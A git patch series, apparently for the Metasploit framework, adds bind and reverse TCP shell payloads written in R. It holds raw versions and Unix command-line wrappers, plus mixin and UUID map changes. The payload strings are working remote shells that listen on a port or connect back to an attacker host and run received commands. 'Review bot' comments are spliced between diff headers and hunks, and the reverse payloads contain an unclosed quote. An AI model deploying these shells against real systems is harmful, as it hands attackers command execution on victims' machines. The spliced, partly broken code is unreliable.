From d76616e8e8c978462c277c556e19711467fdde32 Mon Sep 17 00:00:00 2001
From: RageLtMan
Date: Sat, 19 Aug 2017 05:57:45 -0400
Subject: [PATCH 1/4] Reverse and bind shells in R Initial implementation of bind and reverse TCP shells in R. Supports IPv4 and 6, provides stateless sessions which wont change the cwd when cd is invoked since each command invocation actually spawns a pipe to execute that specific line's invocation. R injections are common in academic software written in a hurry by students or lab administrators. The language runtimes are also commonly found adjacent to valuable data, and often used by teams which are not directly responsible for information security. Testing: Local testing with netcat bind and rev handlers. TODO: Add the appropriate platform/language library definitions
---
 modules/payloads/singles/r/shell_bind_tcp.rb | 43 ++++++++++++++++++
 .../payloads/singles/r/shell_reverse_tcp.rb | 45 +++++++++++++++++++
 2 files changed, 88 insertions(+)
 create mode 100644 modules/payloads/singles/r/shell_bind_tcp.rb
 create mode 100644 modules/payloads/singles/r/shell_reverse_tcp.rb
diff --git a/modules/payloads/singles/r/shell_bind_tcp.rb b/modules/payloads/singles/r/shell_bind_tcp.rb
new file mode 100644
index 0000000000..532b2dbe8a
--- /dev/null
+++ b/modules/payloads/singles/r/shell_bind_tcp.rb
@@ -0,0 +1,43 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/r'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+ CachedSize = 516
+
+ include Msf::Payload::Single
+ include Msf::Payload::R
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'R Command Shell, Bind TCP',
+ 'Description' => 'Continually listen for a connection and spawn a command shell via R',
+ 'Author' => [ 'RageLtMan' ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'r',
+ 'Arch' => ARCH_R,
+ 'Handler' => Msf::Handler::BindTcp,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'r',
+ 'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+ ))
+ end
+
+ def generate
+ return prepends(r_string)
+ end
+
+ def r_string
+ return "s<-socketConnection(port=#{datastore['LPORT']}," +
+ "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
+ "(pipe(readLines(s,1))),s)}"
+ end
+end
diff --git a/modules/payloads/singles/r/shell_reverse_tcp.rb b/modules/payloads/singles/r/shell_reverse_tcp.rb
new file mode 100644
index 0000000000..ca8b7c2235
--- /dev/null
+++ b/modules/payloads/singles/r/shell_reverse_tcp.rb
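Review bot: `CachedSize = 516` is a hand-typed constant, yet `r_string` interpolates `datastore['LPORT']`, so the generated length changes with the configured port, and the identical literal 516 is repeated in shell_reverse_tcp.rb, cmd/unix/bind_r.rb and cmd/unix/reverse_r.rb even though their payload text differs in length. For payloads whose size depends on datastore options the framework convention is `CachedSize = :dynamic`, or a value regenerated by the size-cache tooling rather than copied between files; as far as I recall the cached size feeds payload/exploit space matching, so a stale number misfilters. Separately, `generate` spells out `return prepends(r_string)` where the implicit return `prepends(r_string)` is the framework idiom.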
@@ -0,0 +1,45 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/r'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+ CachedSize = 516
+
+ include Msf::Payload::Single
+ include Msf::Payload::R
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'R Command Shell, Reverse TCP',
+ 'Description' => 'Connect back and create a command shell via R',
+ 'Author' => [ 'RageLtMan' ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'r',
+ 'Arch' => ARCH_R,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'r',
+ 'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+ ))
+ end
+
+ def generate
+ return prepends(r_string)
+ end
+
+ def r_string
+ lhost = datastore['LHOST']
+ lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+ return "s<-socketConnection(host='#{lhost},port=#{datastore['LPORT']}," +
+ "blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
+ "(pipe(readLines(s, 1))),s)}"
+ end
+end
From 0145fc397276cbd4bdf9fdd5c059b7118a65026c Mon Sep 17 00:00:00 2001
From: RageLtMan
Date: Sat, 19 Aug 2017 06:37:09 -0400
Subject: [PATCH 2/4] payload/r.rb and UUID update
---
 lib/msf/core/payload/r.rb | 14 ++++++++++++++
 lib/msf/core/payload/uuid.rb | 6 ++++--
 2 files changed, 18 insertions(+), 2 deletions(-)
 create mode 100644 lib/msf/core/payload/r.rb
diff --git a/lib/msf/core/payload/r.rb b/lib/msf/core/payload/r.rb
new file mode 100644
index 0000000000..730b01adde
--- /dev/null
+++ b/lib/msf/core/payload/r.rb
@@ -0,0 +1,14 @@
+# -*- coding: binary -*-
+require 'msf/core'
+
+module Msf::Payload::R
+
+ def initialize(info = {})
+ super(info)
+ end
+
+ def prepends(buf)
+ buf
+ end
+
+end
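Review bot: `lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)` wraps IPv6 literals in URL-style brackets, but nothing in this change establishes that R's `socketConnection(host=...)` accepts a bracketed literal, and the commit message only reports testing with netcat handlers without saying whether an IPv6 LHOST was exercised. The IPv6 claim in the commit message should be backed by an actual run or documented as unverified, e.g. `# NOTE: bracketed IPv6 literal form assumed to be accepted by socketConnection() — TODO confirm`. The same two lines are duplicated verbatim in cmd/unix/reverse_r.rb, so whichever way this resolves applies there as well.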
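Review bot: `Msf::Payload::R#prepends(buf)` returns its argument unchanged and `initialize` only forwards to `super(info)`, so a reader of this mixin cannot tell whether these are deliberate extension points or leftovers from a template. A comment on `prepends`, e.g. `# Hook for wrapping generated R source; the cmd/unix modules override this to emit a shell command line`, would record the intent, since bind_r.rb and reverse_r.rb in this same series do override it while the r/ modules rely on the pass-through. The no-op `initialize` can be removed outright or given a one-line comment explaining why it exists.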
diff --git a/lib/msf/core/payload/uuid.rb b/lib/msf/core/payload/uuid.rb
index 6b439989ad..acc100406a 100644
--- a/lib/msf/core/payload/uuid.rb
+++ b/lib/msf/core/payload/uuid.rb
@@ -42,7 +42,8 @@ class Msf::Payload::UUID
 23 => ARCH_ZARCH,
 24 => ARCH_AARCH64,
 25 => ARCH_MIPS64,
- 26 => ARCH_PPC64LE
+ 26 => ARCH_PPC64LE,
+ 27 => ARCH_R
 }
 
 Platforms = {
@@ -69,7 +70,8 @@ class Msf::Payload::UUID
 20 => 'js',
 21 => 'python',
 22 => 'nodejs',
- 23 => 'firefox'
+ 23 => 'firefox',
+ 24 => 'r'
 }
 
 # The raw length of the UUID structure
From 7ab097a784f4d83469fa930a41b59f4395bd5d6d Mon Sep 17 00:00:00 2001
From: RageLtMan
Date: Sun, 20 Aug 2017 21:25:57 -0400
Subject: [PATCH 3/4] Unix cmd versions of R payloads Use R to connect back from a unix shell. Notes: We need to DRY this up - tons of copy pasta here, when we should really be instantiating the language specific payloads and just wrapping them with CLI execution strings. Testing: None, yet, just did the quick port to wrap this and push to CI now that rex-arch #4 is in.
---
 modules/payloads/singles/cmd/unix/bind_r.rb | 48 ++++++++++++++++++
 .../payloads/singles/cmd/unix/reverse_r.rb | 49 +++++++++++++++++++
 2 files changed, 97 insertions(+)
 create mode 100644 modules/payloads/singles/cmd/unix/bind_r.rb
 create mode 100644 modules/payloads/singles/cmd/unix/reverse_r.rb
diff --git a/modules/payloads/singles/cmd/unix/bind_r.rb b/modules/payloads/singles/cmd/unix/bind_r.rb
new file mode 100644
index 0000000000..7d459efd63
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/bind_r.rb
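Review bot: The new entries `27 => ARCH_R` and `24 => 'r'` are appended at the tail of both numeric maps instead of renumbering, which is the right choice for ids that, judging by the `Msf::Payload::UUID` class, are encoded into generated payload UUIDs and must stay stable across releases; neither map says so, though. A one-line comment above each map, e.g. `# Wire-format ids embedded in payload UUIDs: append only, never renumber or reuse`, would protect them from a future tidy-up that would silently mis-decode UUIDs already in the field. Note also that the `Platforms` value `'r'` only becomes resolvable for the modules' `'Platform' => 'r'` once a matching `Msf::Module::Platform` definition exists, which the first commit's message lists as an open TODO. The surrounding hash definitions start before and end after these hunks.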
@@ -0,0 +1,48 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/r'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+ CachedSize = 516
+
+ include Msf::Payload::Single
+ include Msf::Payload::R
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Bind TCP (via R)',
+ 'Description' => 'Continually listen for a connection and spawn a command shell via R',
+ 'Author' => [ 'RageLtMan' ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::BindTcp,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'ruby',
+ 'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+ ))
+ end
+
+ def generate
+ return prepends(r_string)
+ end
+
+ def prepends(r_string)
+ return "R -e \"#{r_string}\""
+ end
+
+ def r_string
+ return "s<-socketConnection(port=#{datastore['LPORT']}," +
+ "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
+ "(pipe(readLines(s,1))),s)}"
+ end
+end
diff --git a/modules/payloads/singles/cmd/unix/reverse_r.rb b/modules/payloads/singles/cmd/unix/reverse_r.rb
new file mode 100644
index 0000000000..f03504d5ef
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/reverse_r.rb
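Review bot: `'RequiredCmd' => 'ruby'` does not describe what this module emits: `prepends` builds `R -e "..."`, so the interpreter the module depends on is `R`, and `'ruby'` looks like a copy-paste from another cmd/unix payload; it should name the actual interpreter or be dropped if the framework's RequiredCmd vocabulary has no entry for it. In the same hunk, `prepends` interpolates `r_string` inside shell double quotes with no escaping, which only holds because the R source uses single quotes exclusively; a comment on `prepends` such as `# r_string must not contain double quotes or shell metacharacters` would stop that assumption from breaking silently when the R source is edited. The sibling cmd/unix/reverse_r.rb has the same unescaped wrapper and omits RequiredCmd altogether.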
@@ -0,0 +1,49 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/payload/r'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+ CachedSize = 516
+
+ include Msf::Payload::Single
+ include Msf::Payload::R
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Reverse TCP (via R)',
+ 'Description' => 'Connect back and create a command shell via R',
+ 'Author' => [ 'RageLtMan' ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'r',
+ 'Arch' => ARCH_R,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'r',
+ 'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+ ))
+ end
+
+ def generate
+ return prepends(r_string)
+ end
+
+ def prepends(r_string)
+ return "R -e \"#{r_string}\""
+ end
+
+ def r_string
+ lhost = datastore['LHOST']
+ lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+ return "s<-socketConnection(host='#{lhost},port=#{datastore['LPORT']}," +
+ "blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
+ "(pipe(readLines(s, 1))),s)}"
+ end
+end
From 2873a899dbff392bb357435d1fdb7aac991557e6 Mon Sep 17 00:00:00 2001
From: RageLtMan
Date: Mon, 21 Aug 2017 03:39:03 -0400
Subject: [PATCH 4/4] Address msftidy complaint
---
 modules/payloads/singles/cmd/unix/reverse_r.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/payloads/singles/cmd/unix/reverse_r.rb b/modules/payloads/singles/cmd/unix/reverse_r.rb
index f03504d5ef..cc7eeecde8 100644
--- a/modules/payloads/singles/cmd/unix/reverse_r.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_r.rb
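Review bot: `'Platform' => 'r'`, `'Arch' => ARCH_R` and `'PayloadType' => 'r'` contradict this module's own name (`Unix Command Shell, Reverse TCP (via R)`) and its `generate`, which hands back a shell command line from `prepends`; the sibling cmd/unix/bind_r.rb in the same commit declares `'Platform' => 'unix'`, `'Arch' => ARCH_CMD`, `'PayloadType' => 'cmd'`, and this file should carry the same three values or it registers as a raw R payload while living under cmd/unix. The `r_string` body here is a byte-for-byte copy of r/shell_reverse_tcp.rb, which is the copy-paste drift the commit message itself calls out; moving the shared `r_string` into `Msf::Payload::R` and letting the cmd modules override only `prepends` would remove the surface where such metadata and code mismatches appear.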
@@ -37,7 +37,7 @@ module MetasploitModule
 
 def prepends(r_string)
 return "R -e \"#{r_string}\""
- end
+ end
 
 def r_string
 lhost = datastore['LHOST']